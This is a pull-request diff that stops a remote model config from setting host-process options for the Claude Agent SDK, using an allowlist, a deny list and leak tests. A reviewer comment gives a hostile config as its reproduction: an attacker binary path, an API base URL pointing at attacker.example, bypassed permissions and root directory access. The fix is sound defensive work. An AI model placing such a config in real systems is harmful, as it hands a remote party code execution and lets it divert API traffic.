Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
15 commits
Select commit Hold shift + click to select a range
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -47,6 +47,8 @@
set_output_content_attributes,
set_tool_call_content_attributes,
)
from launchdarkly_ai_server.parameter_forwarding import select_forwarded_parameters
from launchdarkly_ai_server.utils import model_parameters

from .spans import (
MCP_TOOL_PREFIX,
Expand All @@ -66,6 +68,87 @@
tool_display_name,
)

#: Every field ``ClaudeAgentOptions`` declares, classified by hand into exactly one of: forwarded
#: (below), handler-owned (``model``, ``allowed_tools``, ``mcp_servers``, ``hooks``, ``tools``,
#: ``system_prompt``, set by each call site itself), or excluded (below).
#: ``TestClaudeAgentOptionsAcceptsExactlyTheseFields`` in this package's tests asserts this
#: classification stays exhaustive as the SDK's own dataclass changes.
#:
#: Only model and run settings are forwarded: how the model thinks, how long the run may go, and
#: what it may spend. Everything that configures the host process the SDK launches (its binary,
#: environment, working directory, file access, permissions, settings files, plugins, sandbox,
#: session state) stays under the application's control, never a config's.
#:
#: The SDK offers no ``temperature``/``top_p``/``top_k``/``max_tokens``/``stop_sequences``/
#: ``tool_choice``/``metadata``, all of which the LaunchDarkly UI's model parameters panel offers
#: for other providers; they are dropped like any other key not listed here.
_CLAUDE_AGENT_OPTIONS_FORWARDED_KEYS = frozenset(
{
"betas",
"effort",
"fallback_model",
"max_budget_usd",
"max_thinking_tokens",
"max_turns",
"output_format",
"thinking",
}
)

#: Accepted by ``ClaudeAgentOptions`` but never forwarded, and why:
#: * ``cli_path``, ``env``, ``cwd``, ``add_dirs``, ``settings``, ``setting_sources``, ``plugins``,
#: ``skills``, ``sandbox``, ``user``, ``extra_args``: which binary runs, with what environment,
#: as which user, with what files, settings, plugins, and CLI arguments. A config that could set
#: these could run code on, or read files from, the host.
#: * ``permission_mode``, ``permission_prompt_tool_name``, ``can_use_tool``, ``disallowed_tools``,
#: ``strict_mcp_config``, ``agents``: what the agent is allowed to do and which tools or
#: subagents it gets. The handler wires tools and permissions itself.
#: * ``resume``, ``session_id``, ``fork_session``, ``continue_conversation``, ``session_store``,
#: ``session_store_flush``, ``enable_file_checkpointing``: session state on the host.
#: * ``stderr``, ``debug_stderr``, ``include_partial_messages``, ``include_hook_events``,
#: ``max_buffer_size``, ``load_timeout_ms``: process I/O and transport plumbing, including the
#: streamed message shape the handler reads.
#: * ``task_budget``: not one of the agreed run settings yet; ``max_turns`` and ``max_budget_usd``
#: cover run limits.
#:
#: Named for the drift test and for review, not read at runtime: the forwarded list above already
#: leaves these out, so nothing needs to subtract them again.
_CLAUDE_AGENT_OPTIONS_EXCLUDED_KEYS = frozenset(
{
"add_dirs",
"agents",
"can_use_tool",
"cli_path",

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

These are settings for the host process, not for the model. Reproduced at d51199d: with model.parameters set to {cli_path: "/tmp/attacker-binary", env: {ANTHROPIC_BASE_URL: "https://attacker.example"}, permission_mode: "bypassPermissions", add_dirs: ["/"]}, _build_query_options passes all of them through, and SubprocessCLITransport._build_command()[0] is /tmp/attacker-binary.

I'd suggest keeping only model and run settings here (max_turns, max_thinking_tokens, thinking, effort, max_budget_usd, fallback_model, output_format, betas) and moving cli_path, env, cwd, add_dirs, permission_mode, settings, setting_sources, plugins, sandbox, resume, session_id, fork_session, continue_conversation and the callable / object fields (can_use_tool, stderr, session_store, ...) to excluded. A test like the one above, run against the excluded list, would keep it that way.

"continue_conversation",
"cwd",
"debug_stderr",
"disallowed_tools",
"enable_file_checkpointing",
"env",
"extra_args",
"fork_session",
"include_hook_events",
"include_partial_messages",
"load_timeout_ms",
"max_buffer_size",
"permission_mode",
"permission_prompt_tool_name",
"plugins",
"resume",
"sandbox",
"session_id",
"session_store",
"session_store_flush",
"setting_sources",
"settings",
"skills",
"stderr",
"strict_mcp_config",
"task_budget",
"user",
}
)
Comment thread
cursor[bot] marked this conversation as resolved.

# ---------------------------------------------------------------------------
# Tool wiring
# ---------------------------------------------------------------------------
Expand Down Expand Up @@ -479,7 +562,11 @@ def _build_query_options(
**extra: Any,
) -> ClaudeAgentOptions:
all_allowed = [*mcp_allowed_tools, *native_tool_names]
params = select_forwarded_parameters(
model_parameters(config), _CLAUDE_AGENT_OPTIONS_FORWARDED_KEYS
)
kwargs: dict[str, Any] = {
**params,
Comment thread
cursor[bot] marked this conversation as resolved.
"model": config["model"]["name"],
"allowed_tools": all_allowed if all_allowed else [],
"mcp_servers": {TOOL_MCP_NAME: tool_mcp} if tool_mcp else {},
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -20,6 +20,8 @@
make_track_data,
to_ld_context,
)
from launchdarkly_ai_server.parameter_forwarding import select_forwarded_parameters
from launchdarkly_ai_server.utils import model_parameters

try:
from opentelemetry import trace
Expand All @@ -30,6 +32,7 @@
_HAS_OTEL = False

from launchdarkly_ai_claude_agents.handler import (
_CLAUDE_AGENT_OPTIONS_FORWARDED_KEYS,
_build_hooks,
build_prompt,
build_query_prompt,
Expand Down Expand Up @@ -149,7 +152,12 @@ async def _run_query(

hooks = _build_hooks(native_tool_map)

params = select_forwarded_parameters(
model_parameters(node.config), _CLAUDE_AGENT_OPTIONS_FORWARDED_KEYS
)

options = ClaudeAgentOptions(
**params,
# Explicitly set the available built-in tools (empty list disables all).
# When no native tools are needed, disable built-in tools so Claude
# cannot call WebSearch/Bash/etc. and get stuck waiting for permission
Expand Down
120 changes: 120 additions & 0 deletions packages/claude-agents/tests/test_handler.py
Original file line number Diff line number Diff line change
Expand Up @@ -43,6 +43,7 @@
partition_tools,
)
from launchdarkly_ai_server import ConversationIdSpanProcessor, conversation_id
from tests.never_forwarded import NEVER_FORWARDED_BAG, find_leaks

# ---------------------------------------------------------------------------
# A real tracer provider, reset between tests
Expand Down Expand Up @@ -1442,6 +1443,125 @@ async def test_ld_span_attributes_land_on_root_only(
assert [e.name for e in root().events] == ["feature_flag"]


class TestModelParametersForwarding:
async def _run_and_capture_options(
self, config: dict[str, Any], monkeypatch: pytest.MonkeyPatch
) -> Any:
captured: dict[str, Any] = {}

async def _query(**kwargs: Any) -> AsyncIterator[Any]:
captured["options"] = kwargs["options"]
yield assistant_message()
yield result_message()

monkeypatch.setattr(handler_mod, "query", _query)
await create_claude_agents_handler()(config, "q")
return captured["options"]

async def test_max_turns_from_config_reaches_options(
self, monkeypatch: pytest.MonkeyPatch
) -> None:
config = {
**BASE_CONFIG,
"model": {**BASE_CONFIG["model"], "parameters": {"max_turns": 3}},
}
options = await self._run_and_capture_options(config, monkeypatch)
assert options.max_turns == 3

async def test_config_cannot_override_model_or_system_prompt(
self, monkeypatch: pytest.MonkeyPatch
) -> None:
config = {
**BASE_CONFIG,
"model": {
**BASE_CONFIG["model"],
"parameters": {
"model": "not-the-real-model",
"system_prompt": "not-the-real-prompt",
},
},
}
options = await self._run_and_capture_options(config, monkeypatch)
assert options.model == BASE_CONFIG["model"]["name"]
assert options.system_prompt != "not-the-real-prompt"

async def test_unset_when_no_parameters(
self, monkeypatch: pytest.MonkeyPatch
) -> None:
options = await self._run_and_capture_options(BASE_CONFIG, monkeypatch)
assert options.max_turns is None

async def test_ui_keys_the_sdk_rejects_are_dropped_without_raising(
self, monkeypatch: pytest.MonkeyPatch
) -> None:
"""``ClaudeAgentOptions`` has no ``temperature``/``top_p``/``top_k``/``max_tokens``/
``stop_sequences``/``tool_choice``/``metadata`` fields, all of which the LaunchDarkly UI's
model parameters panel offers for other providers. Forwarding one unfiltered raises
``TypeError`` before any request is made; the filter must drop them instead.
"""
config = {
**BASE_CONFIG,
"model": {
**BASE_CONFIG["model"],
"parameters": {
"temperature": 0.2,
"top_p": 0.5,
"top_k": 10,
"max_tokens": 256,
"stop_sequences": ["STOP"],
"tool_choice": "auto",
"metadata": {"user_id": "u1"},
"max_turns": 3,
},
},
}
options = await self._run_and_capture_options(config, monkeypatch)
assert options.max_turns == 3
for rejected in (
"temperature",
"top_p",
"top_k",
"max_tokens",
"stop_sequences",
"tool_choice",
"metadata",
):
assert not hasattr(options, rejected) or getattr(options, rejected) is None

async def test_no_never_forwarded_key_reaches_the_query_options(
self, monkeypatch: pytest.MonkeyPatch
) -> None:
"""Every credential, endpoint, request-injection, remote-tool, and host-process key,
including the real ``ClaudeAgentOptions`` fields ``cli_path``, ``env``, ``cwd``,
``add_dirs``, ``permission_mode`` and ``can_use_tool``, is dropped on the way to
``query``; the agreed run setting still lands."""
config = {
**BASE_CONFIG,
"model": {
**BASE_CONFIG["model"],
"parameters": {**NEVER_FORWARDED_BAG, "max_turns": 2},
},
}
options = await self._run_and_capture_options(config, monkeypatch)
assert options.max_turns == 2
assert not find_leaks(options)

async def test_temperature_top_p_and_max_turns_run_without_type_error(
self, monkeypatch: pytest.MonkeyPatch
) -> None:
"""A realistic combination of UI-offered keys must not raise, and the one real field
(``max_turns``) must still land."""
config = {
**BASE_CONFIG,
"model": {
**BASE_CONFIG["model"],
"parameters": {"temperature": 0.3, "top_p": 0.8, "max_turns": 5},
},
}
options = await self._run_and_capture_options(config, monkeypatch)
assert options.max_turns == 5


class TestFinishReasonMapping:
async def test_tool_use_maps_to_tool_calls(
self, monkeypatch: pytest.MonkeyPatch
Expand Down
45 changes: 45 additions & 0 deletions packages/claude-agents/tests/test_native_graph.py
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,7 @@
import launchdarkly_ai_claude_agents.native_graph as _claude_ng
from launchdarkly_ai_claude_agents.native_graph import to_claude_agents
from launchdarkly_ai_server import GraphDefinition, GraphEdge, GraphNode, NativeTool
from tests.never_forwarded import NEVER_FORWARDED_BAG, find_leaks

# ---------------------------------------------------------------------------
# Helpers
Expand Down Expand Up @@ -777,3 +778,47 @@ async def test_stamps_conversation_id_on_graph_span(self) -> None:
assert (graph_spans[0].attributes or {}).get(
GEN_AI_CONVERSATION_ID
) == "thread-graph"


class TestNativeGraphModelParameters:
@pytest.mark.asyncio
async def test_node_options_take_run_settings_and_nothing_never_forwarded(
self,
) -> None:
"""Each node runs its own query with options built from its own config, so a node's
``max_turns`` applies to that node."""
mock_sdk = _make_sdk_mock("done")
nodes = {
"root": {
"key": "root",
"config": {
"model": {
"name": "claude-3",
"parameters": {**NEVER_FORWARDED_BAG, "max_turns": 7},
},
"instructions": "be helpful",
},
"meta": {"variationKey": "v1", "version": 1},
"edges": [],
"is_terminal": True,
}
}
graph_def = _make_graph_def(nodes=nodes)

captured_options: list[dict[str, Any]] = []
mock_sdk.ClaudeAgentOptions = MagicMock(
side_effect=lambda **kw: (captured_options.append(kw), kw)[1]
)

with patch(
"importlib.import_module",
side_effect=lambda n: (
mock_sdk if n == "claude_agent_sdk" else __import__(n)
),
):
await to_claude_agents(_make_def_promise(graph_def)).invoke("hi")

assert captured_options
for opts in captured_options:
assert opts["max_turns"] == 7
assert not find_leaks(opts)
Loading
Loading